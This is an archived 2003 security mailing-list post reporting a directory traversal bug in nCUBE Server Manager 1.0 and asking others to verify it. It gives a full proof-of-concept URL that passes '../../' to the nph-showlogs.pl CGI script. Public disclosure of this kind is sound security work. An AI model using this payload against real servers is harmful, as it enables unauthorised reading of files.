OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
nCUBE Server Manager

bug_hunthotmail.com
Date: Sun Nov 09 2003 - 18:59:56 CST


can anybody verify this bug in
nCUBE Server Manager (nSM) Version 1.0

i found a server where i can do a Directory Traversal!
using the following url:

http://server.com/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0